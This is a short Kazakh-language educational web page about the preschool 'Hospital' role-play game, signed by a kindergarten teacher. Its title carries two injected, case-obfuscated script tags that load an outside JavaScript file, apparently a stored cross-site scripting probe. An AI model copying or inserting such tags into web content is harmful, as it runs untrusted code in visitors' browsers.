«Ақ халатты адамдар!» сөжетті ролдік ойын<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.06.2020

Баланың дамуын ойынсыз елестету мүмкін емес, ал  сюжетті-ролдік ойындар – бұл мектепке дейінгі балалардың негізгі қызметі. Сюжетті-ролдік ойын – бұл алдымен кішкентай адамның әлеммен саналы түрде әрекеттесуі болып табылады, онда бала шығармашылық субъектінің басты рөлін атқарады, бұл оның өзін-өзі тану және таныту тәсілі, онда бала өзінің қандай болғысы келетінін анықтайды, ал ойында бала өзі қалаған жерде болады, қызықты және тартымды оқиғаларға қатысады. «Аурухана» ойыны – балалардың ең көп таралған сюжетті-рөлдік ойыны болып табылады. Ойын барысында, балалар тақырыптық әңгімелер мен сабақтарда  «ақ халатты адамдар»  дәрігерлер мен медбикелер мамандықтары жайлы танысады.  Сюжетті – рөлдік ойындар басқа білім құралдарымен үйлесімді, қиын жағдайлардан шығуға, өз ара шешім қабылдауға, бастапқы іс-әрекеттер жасауға қабілетті, дамыған белсенді жеке тұлғаны  қалыптастыруға, болашақ өмірде қажет болатын қасиеттерді игеруге негіз  бола алады.    Тәрбиеші: Сариева Ж.Е.

Просмотров: 408


Пікір қосу



Деректерді қолтаңбаға қосу